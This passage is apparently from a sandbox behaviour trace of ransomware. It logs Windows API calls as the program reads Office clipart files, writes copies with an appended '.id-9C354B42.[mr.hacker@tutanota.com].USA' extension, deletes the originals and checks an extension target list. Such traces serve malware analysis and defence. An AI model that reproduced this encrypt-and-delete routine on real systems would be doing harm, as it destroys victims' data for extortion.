(hObject=0x2bc) returned 1 [0273.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf")) returned 1 [0273.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.191] lstrlenW (lpString=".doc") returned 4 [0273.191] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.191] lstrlenW (lpString=".docx") returned 5 [0273.191] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.192] lstrlenW (lpString=".pdf") returned 4 [0273.192] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString=".xls") returned 4 [0273.192] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.192] lstrlenW (lpString=".xlsx") returned 5 [0273.192] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.192] lstrlenW (lpString=".ppt") returned 4 [0273.192] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.192] lstrlenW (lpString=".zip") returned 4 [0273.192] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.192] lstrlenW (lpString=".rar") returned 4 [0273.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString=".bz2") returned 4 [0273.192] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString=".7z") returned 3 [0273.192] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.192] lstrlenW (lpString=".dbf") returned 4 [0273.192] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.192] lstrlenW (lpString=".1cd") returned 4 [0273.192] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.192] lstrlenW (lpString=".jpg") returned 4 [0273.192] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.192] lstrlenW (lpString=".doc") returned 4 [0273.192] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString=".docx") returned 5 [0273.193] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.193] lstrlenW (lpString=".pdf") returned 4 [0273.193] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString=".xls") returned 4 [0273.193] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.193] lstrlenW (lpString=".xlsx") returned 5 [0273.193] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.193] lstrlenW (lpString=".ppt") returned 4 [0273.193] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.193] lstrlenW (lpString=".zip") returned 4 [0273.193] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.193] lstrlenW (lpString=".rar") returned 4 [0273.193] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString=".bz2") returned 4 [0273.193] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString=".7z") returned 3 [0273.193] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.193] lstrlenW (lpString=".dbf") returned 4 [0273.193] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.193] lstrlenW (lpString=".1cd") returned 4 [0273.193] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63 [0273.193] lstrlenW (lpString=".jpg") returned 4 [0273.193] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.194] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.194] lstrlenW (lpString="HM00005_.WMF") returned 12 [0273.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.194] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=23300) returned 1 [0273.195] CloseHandle (hObject=0x388) returned 1 [0273.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf")) returned 0x20 [0273.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.195] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.195] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.195] GetLastError () returned 0x0 [0273.195] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x5b04, lpOverlapped=0x0) returned 1 [0273.197] WriteFile (in: hFile=0x2bc, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x5b10, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x5b10, lpOverlapped=0x0) returned 1 [0273.198] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.198] WriteFile (in: hFile=0x2bc, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.198] SetEndOfFile (hFile=0x2bc) returned 1 [0273.198] CloseHandle (hObject=0x2bc) returned 1 [0273.198] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.198] SetEndOfFile (hFile=0x388) returned 1 [0273.200] CloseHandle (hObject=0x388) returned 1 [0273.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf")) returned 1 [0273.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63 [0273.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63 [0273.200] lstrlenW (lpString=".doc") returned 4 [0273.201] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString=".docx") returned 5 [0273.201] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.201] lstrlenW (lpString=".pdf") returned 4 [0273.201] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString=".xls") returned 4 [0273.201] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.201] lstrlenW (lpString=".xlsx") returned 5 [0273.201] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.201] lstrlenW (lpString=".ppt") returned 4 [0273.201] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63 [0273.201] lstrlenW (lpString=".zip") returned 4 [0273.201] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.201] lstrlenW (lpString=".rar") returned 4 [0273.201] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString=".bz2") returned 4 [0273.201] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString=".7z") returned 3 [0273.201] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63 [0273.201] lstrlenW (lpString=".dbf") returned 4 [0273.201] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63 [0273.201] lstrlenW (lpString=".1cd") returned 4 [0273.201] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63 [0273.201] lstrlenW (lpString=".jpg") returned 4 [0273.201] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.202] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=22116) returned 1 [0273.202] CloseHandle (hObject=0x388) returned 1 [0273.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf")) returned 0x20 [0273.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.203] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.203] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.204] GetLastError () returned 0x0 [0273.204] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x5664, lpOverlapped=0x0) returned 1 [0273.206] WriteFile (in: hFile=0x2bc, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x5670, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x5670, lpOverlapped=0x0) returned 1 [0273.206] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.207] WriteFile (in: hFile=0x2bc, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.207] SetEndOfFile (hFile=0x2bc) returned 1 [0273.207] CloseHandle (hObject=0x2bc) returned 1 [0273.207] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.207] SetEndOfFile (hFile=0x388) returned 1 [0273.209] CloseHandle (hObject=0x388) returned 1 [0273.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf")) returned 1 [0273.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63 [0273.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63 [0273.209] lstrlenW (lpString=".doc") returned 4 [0273.209] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.209] lstrlenW (lpString=".docx") returned 5 [0273.209] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.209] lstrlenW (lpString=".pdf") returned 4 [0273.209] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.209] lstrlenW (lpString=".xls") returned 4 [0273.209] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.209] lstrlenW (lpString=".xlsx") returned 5 [0273.210] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.210] lstrlenW (lpString=".ppt") returned 4 [0273.210] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63 [0273.210] lstrlenW (lpString=".zip") returned 4 [0273.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.210] lstrlenW (lpString=".rar") returned 4 [0273.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.210] lstrlenW (lpString=".bz2") returned 4 [0273.210] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.210] lstrlenW (lpString=".7z") returned 3 [0273.210] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63 [0273.210] lstrlenW (lpString=".dbf") returned 4 [0273.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63 [0273.210] lstrlenW (lpString=".1cd") returned 4 [0273.210] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63 [0273.210] lstrlenW (lpString=".jpg") returned 4 [0273.210] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.210] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=15852) returned 1 [0273.211] CloseHandle (hObject=0x388) returned 1 [0273.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf")) returned 0x20 [0273.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.211] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.211] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.211] GetLastError () returned 0x0 [0273.211] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x3dec, lpOverlapped=0x0) returned 1 [0273.249] WriteFile (in: hFile=0x2bc, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x3df0, lpOverlapped=0x0) returned 1 [0273.250] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.250] WriteFile (in: hFile=0x2bc, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.250] SetEndOfFile (hFile=0x2bc) returned 1 [0273.250] CloseHandle (hObject=0x2bc) returned 1 [0273.250] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.250] SetEndOfFile (hFile=0x388) returned 1 [0273.252] CloseHandle (hObject=0x388) returned 1 [0273.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.276] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf")) returned 1 [0273.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63 [0273.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63 [0273.276] lstrlenW (lpString=".doc") returned 4 [0273.276] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.276] lstrlenW (lpString=".docx") returned 5 [0273.276] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.276] lstrlenW (lpString=".pdf") returned 4 [0273.276] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.276] lstrlenW (lpString=".xls") returned 4 [0273.276] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.276] lstrlenW (lpString=".xlsx") returned 5 [0273.276] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.276] lstrlenW (lpString=".ppt") returned 4 [0273.276] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63 [0273.277] lstrlenW (lpString=".zip") returned 4 [0273.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.277] lstrlenW (lpString=".rar") returned 4 [0273.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.277] lstrlenW (lpString=".bz2") returned 4 [0273.277] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.277] lstrlenW (lpString=".7z") returned 3 [0273.277] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63 [0273.277] lstrlenW (lpString=".dbf") returned 4 [0273.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63 [0273.277] lstrlenW (lpString=".1cd") returned 4 [0273.277] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63 [0273.277] lstrlenW (lpString=".jpg") returned 4 [0273.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.277] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=11190) returned 1 [0273.277] CloseHandle (hObject=0x3b0) returned 1 [0273.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf")) returned 0x20 [0273.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.278] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.278] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.278] GetLastError () returned 0x0 [0273.278] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x2bb6, lpOverlapped=0x0) returned 1 [0273.282] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x2bc0, lpOverlapped=0x0) returned 1 [0273.283] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.283] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.283] SetEndOfFile (hFile=0x390) returned 1 [0273.283] CloseHandle (hObject=0x390) returned 1 [0273.283] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.283] SetEndOfFile (hFile=0x3b0) returned 1 [0273.285] CloseHandle (hObject=0x3b0) returned 1 [0273.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 